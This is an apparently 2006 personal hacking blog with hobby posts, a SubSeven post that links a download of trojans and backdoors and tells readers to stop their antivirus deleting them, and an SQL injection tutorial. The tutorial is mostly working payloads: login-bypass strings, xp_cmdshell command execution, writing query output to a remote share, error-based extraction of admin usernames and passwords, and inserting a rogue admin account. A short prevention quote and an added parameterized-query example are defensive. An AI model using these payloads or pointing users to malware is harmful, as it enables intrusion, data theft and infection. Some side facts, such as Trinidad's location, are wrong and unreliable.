<body>

The Lone Hacker

A view on the world, among other things.

Netscape.com Hacked!

Wednesday, July 26, 2006

"Tom Way is the sexiest man alive." reads this hacked-in dialog box on Netscape.com.

Recently, after Netscape.com started its Digg-like service, a cross-site scripting (XSS) vulnerability in it was exploited by Digg users. Read/see it here.

Netscape.com here.

Hack This Site!

I know, I know. You WANT TO HACK NOW! Well, more than just "another hacking wargames site," hackthissite.org stands out from the rest. Quoted from the front page:

"Hack This Site is a free, safe and legal training ground for hackers to test and expand their hacking skills. More than just another hacker wargames site, we are a living, breathing community with many active projects in development, with a vast selection of hacking articles and a huge forum where users can discuss hacking, network security, and just about everything. Tune in to the hacker underground and get involved with the project.

First timers should read the HTS Project Guide and create an account to get started. "

Here are some other links:
About the Project
Bill of Rights
Legal Disclaimer
Pass us around!

And also, I give it my new "ChrisTek's Seal of Approval", LOL, which I will get a graphic for in future, but this site gets

☼☼☼☼☼ 5 Stars!

Sketching

Tuesday, July 25, 2006
Recently I have been extremely bored, and taken to my old habit of sketching. Found an interesting-yet-easy-to-draw manga called Shaman King (I guess it's a TV show too?!) And have done about six sketches. I also found a nifty site called DeviantART, where I can organize and display them. Soooo, check out christek.deviantart.com!

SubSeven

Sunday, July 16, 2006
One serious threat is spyware. And I don't mean the wimpy ad-ware variety that pops up ads on your PC. I mean SubSeven, Trojans, etcetera. Serious stuff. Now, SubSeven, one of the worst spywares to get, allows total remote control of your PC, right down to editing the registry. It is also invisible. No taskbar icons, no ads, only a few values and a server app, which usually destroys itself after launching. It can also be disguised as ANY type of file, changing icons, names, etcetera. For a demo of SubSeven, download the Hacker's Toolkit, from

http://www4.rapidupload.com/d.php?file=dl&filepath=1594

Disclaimer: I am not responsible for what you do with the programs provided above. They are for examination and demo purposes only. This pack contains many trojans, backdoors, spywares, etcetera. Use at your own risk.

Now that I covered that, you must stop your antivirus from deleting most of that file, for it contains many trojans, backdoors, spywares, etcetera. One of the folders in that ZIP file contains both SubSeven apps, server and client. Open the client, and witness what this baby can do. Awesome! Very powerful. It even gives you an option to run it on your own computer! Now drag the client app to your desktop to use it.

SubSeven provides an option to run a demo on your own computer. Use it to see what SubSeven can really do. To remove SubSeven if it has infected your computer, launch your Antivirus software and it should remove it. If not, go to Start > Run > regedit

Search for SubSeven. Sure enough, the registry keys are actually labeled SubSeven. Delete the needed keys from the registry, and restart. Simple as that! And SubSeven gets:

☼☼ 2 Stars!

Steel Pans

Saturday, July 15, 2006
Do you know what is amazing? The ability of a cut-off, dented steel drum to make awesome music. Don't believe me? Meet the steel pan. As you can see, on this model, the notes (dents) are individually labeled. Another piece of trivia: this drum is the national instrument of Trinidad, Africa, (it's an island) between Africa and South America. Look it up some time. For some tourist info, check out http://www.visittnt.com/. Pretty nice site! They even have an entire section dedicated to the steel pan, found at http://www.visittnt.com/pan.html. Cool!

North Korea

Friday, July 14, 2006
And now for a worldview. I believe if North Korea launches a missile with a nuclear warhead at anyone, the US should blow the he** out of them with nukes.

Another thing. Why the heck are we destroying our ICBMs?!?! (For those uneducated, Intercontinental Ballistic Missiles... Blow things up anywhere in the world)

Why? What's the use of warheads if you can't shoot people with them?!?

Maybe you guys can shed some light on it.

SQL Injection

Today I'll show you some simple steps to learn some simple concepts about a simple intrusion method. This will help you protect your server from possible attacks. Disclaimer: I am not responsible nor held liable for any actions you attempt using this information.

When a server only has the web port (usually 80 or 8080) open, and the server is relatively secure, then a possible intruder must turn to hacking the web application itself. One simple method against an SQL-equipped server (used for many database-driven web apps, such as forums or login screens) is a technique called "SQL Injection", meaning you are able to "inject" code into the SQL query the server runs. For you techies: "It takes parameters from the user, and makes an SQL query to a database."

Meaning you need to find an input prompt. Like a login screen. You should look for pages that include ASP, JSP, CGI, or PHP. Look for a URL that has parameters, like

http://hackerblog.com/index.asp?id=13

Or similar. So now you found the page, test if it is vulnerable. Start off with some simple parameters, like

1=1--

or, alternatively,

test'

Type those into one of the inputs, or even the URL itself. EG

http://hackerblog.com/index.asp?id=test'

or

http://hackerblog.com/index.asp?id=1=1--

If the field is hidden, you can still download the source code and find the hidden field, fill it in like above, then save it as an HTML file and open it. If you can't do that, you probably shouldn't be reading this! EG


There ya go. If it works, you will be able to log in without any password, etcetera. If so, lucky you! We use -- because it starts a comment, so the server ignores the rest of the query (including the password check); the always-true 1=1 condition then matches the entire table, and the application logs you in since it looks like you matched every user. That's the best I can explain it. Figure out the "why's?" better for yourselves if you want. Now if that doesn't work, there are several other options:

" or "a"="a
') or ('a'='a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a

The next bit here, I quote from SecuriTeam, (http://securiteam.com)

"Being able to inject SQL commands usually means we can execute any SQL query at will. The default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semicolon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets from 10.10.1.2, and check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

It is possible to use sp_makewebtask to write your query into an HTML file:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must have the folder "share" shared for Everyone.

We can use information from the error messages produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching pattern '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtain the rest of the column names, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

Now that we have identified some important tables and their columns, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

There is a limitation with the technique described above. We cannot get any error message if we are trying to convert text that consists of a valid number (characters between 0-9 only). Let's say we are trying to get the password of "trinity", which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before the UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL Server will not throw an ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append some letters to the numeric string to make sure the conversion fails. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append any text we want to the password. (ASCII code for '+' = 0x2b). We will append '(space)morpheus' to the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out an ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'."

Alright. Now that SecuriTeam has explained how to snag some data from the server, we will go on to insert data into it.

To insert data, use INSERT INTO, EG

http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

Another quote from SecuriTeam on how to prevent it from happening to you.

"Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric values, convert them to an integer before passing them into the SQL statement, or use ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask"

To hackers, remember it's something completely preventable by good coding practice, and it is usually only possible when the developer is being lazy or sloppy.
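To show what "good coding practice" means for the login screen and the id parameter discussed above, here is an added example (not code from the original post or from SecuriTeam). It rebuilds the article's admin_login table with constructed sample rows in an in-memory SQLite database, standing in for MS SQL Server, and contrasts a query built by string concatenation with a parameterized one, plus the "convert numeric input to an integer first" advice.

```python
# Added example: vulnerable string-built query beside its hardened form.
# Table name, column names and sample rows mirror the article; the data
# is constructed here and SQLite stands in for MS SQL Server.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_login (login_id INTEGER, login_name TEXT, "
                 "password TEXT, details TEXT)")
    # Plaintext passwords only to mirror the article's table layout.
    conn.executemany("INSERT INTO admin_login VALUES (?, ?, ?, ?)",
                     [(1, "neo", "m4trix", "NA"), (2, "trinity", "31173", "NA")])
    return conn


def login_concat(conn, user, pw):
    # Vulnerable: the input is spliced into the SQL text, so a quote ends the
    # string literal, "or 1=1" makes the WHERE clause always true, and "--"
    # comments out the password check. Returns the first matching login name.
    sql = (f"SELECT login_name FROM admin_login "
           f"WHERE login_name='{user}' AND password='{pw}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn, user, pw):
    # Hardened: placeholders keep the input as data; the driver never treats
    # quotes or comment markers in it as part of the statement.
    sql = "SELECT login_name FROM admin_login WHERE login_name=? AND password=?"
    row = conn.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


def lookup_by_id(conn, raw_id):
    # Numeric parameter: convert to int before it goes anywhere near SQL, as
    # the prevention advice says. "10 UNION SELECT ..." is not an integer, so
    # it is rejected and never reaches the database.
    try:
        login_id = int(raw_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute("SELECT login_name FROM admin_login WHERE login_id=?",
                       (login_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("concat:", login_concat(db, payload, "wrong"))  # neo (bypassed)
    print("param: ", login_param(db, payload, "wrong"))   # None (rejected)
    print("id:    ", lookup_by_id(db, "10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--"))
```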

The Lone Hacker

Hello. I would be Chris, (ChrisTek) The Lone Hacker. Bringing you junk about my opinions on the world, with a bit of... handy... computer knowledge along the way.